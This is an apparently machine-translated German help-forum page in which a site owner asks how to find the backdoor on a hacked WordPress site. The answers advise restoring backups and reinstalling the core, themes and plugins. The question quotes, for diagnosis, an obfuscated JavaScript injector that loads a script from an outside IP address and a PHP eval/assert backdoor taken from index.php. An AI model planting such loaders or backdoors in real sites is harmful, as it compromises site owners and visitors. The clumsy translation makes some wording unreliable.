Wie finde ich die Hintertür des Hacks?

Heute wurde eine WordPress-Seite unserer Kunden gehackt, die bei Amazon AWS Ubuntu gehostet wird.

Problem ist https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html

Der js-Code wird in alle js injiziert

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80)) 

und in index.php

 //###====### @error_reporting(E_ALL); @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode"); $light = $strings2($gbz.'("nJLtXPScp"));'); $strings($light); //###====### 

Schritte, denen ich folge:

  1. Ich lade alle js in local herunter (benutze den Befehl zip -r js_files.zip wp-content -i ‘* .js’) und ersetze den Schadcode mit erhabenem Text und lade diesen hoch.
  2. Löschen Sie den schädlichen Code von index.php.
  3. Blockiere die IP-Adresse in .htaccess

     Order Deny,Allow Deny from 134.249.116.78 
  4. Ändern Sie die Berechtigung für den Ordner und die Dateien (mit http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/hosting-wordpress.html )

Meine Frage ist:

Nach all dem wird immer noch der Code injiziert. Wie ich die Hintertür des Hackers zur Baustelle finde. Bitte führen Sie mich.

Solutions Collecting From Web of "Wie finde ich die Hintertür des Hacks?"

Mit den Schritten 1 und 2 entfernen Sie nur die Symptome der Infektion, nicht die Infektion selbst. Die Berechtigung zum Blockieren des Zugriffs und zum Ändern (Schritte 3 und 4) macht einen Unterschied für die Außenansprache Ihres Systems. Aber die Infektion ist bereits in Ihrer Website. Also, mit diesen Schritten tun Sie nichts, um die Infektion zu entfernen.

Die Infektion kann überall sein: In Ihrem Thema, einige Plug-Ins, in der database versteckt, im WordPress-core, Sie nennen es. Der narrensicherste Weg, dies zu erreichen, besteht darin, die Site vollständig zu löschen und ein Backup zu installieren. Sonst müssen Sie einen langwierigen process durchlaufen .

Die Hintertür befindet sich höchstwahrscheinlich in der Datei functions.php des Themes. Schau dir das an und du wirst die Antwort finden, die ich glaube.

WordPress-core ist so selten kompromittiert. Dies muss durch ein bösartiges Thema verursacht werden.

Wenn Sie nach dem Ursprung des Hacks suchen, müssen Sie Ihre Zugriffsprotokolle durchsuchen. Keine leichte Sache.

Ich würde die folgenden grundlegenden Schritte ausführen

  • Sichern Sie alles auf dem lokalen Computer
  • Installieren Sie WP über die Dashboard / Update-Seite neu
  • Laden Sie alle Designs neu (entweder manuell oder indem Sie das Design löschen und neu installieren). Ein manueller Download-auf-lokalen-Computer, der dann in den Design-Ordner hochgeladen wird (möglicherweise nach dem Löschen der Dateien im Design-Ordner) behält möglicherweise alle Einstellungen bei
  • Machen Sie dasselbe für alle Plugins (manuell oder deaktivieren-löschen-neu installieren); Auch hier kann der manuelle process die Plugin-Einstellungen beibehalten
  • Suchen Sie nach zusätzlichen Dateien in allen Ordnern (aktualisierte Dateien haben denselben Zeitstempel. Suchen Sie daher nach Dateien außerhalb des Neuinstallationsdatums / der -uhrzeit). Löschen Sie alle zusätzlichen Dateien.

In Ihrer database könnte ein Schaden entstehen, so dass Sie eine Sicherungskopie der database wiederherstellen könnten (Sie haben Sicherungskopien erstellt, oder?).

Einige Hosts stellen eine vollständige Standortsicherung wieder her; Sie könnten mehrere aktuelle Backups behalten. Dies wird jeden aktualisierten Inhalt / etc zerstören, also solltest du WP und Themes und Plugins trotzdem neu installieren. Einige Hosts verfügen möglicherweise über eine Sicherungskopie der database, die sie installieren können.

Viel Glück.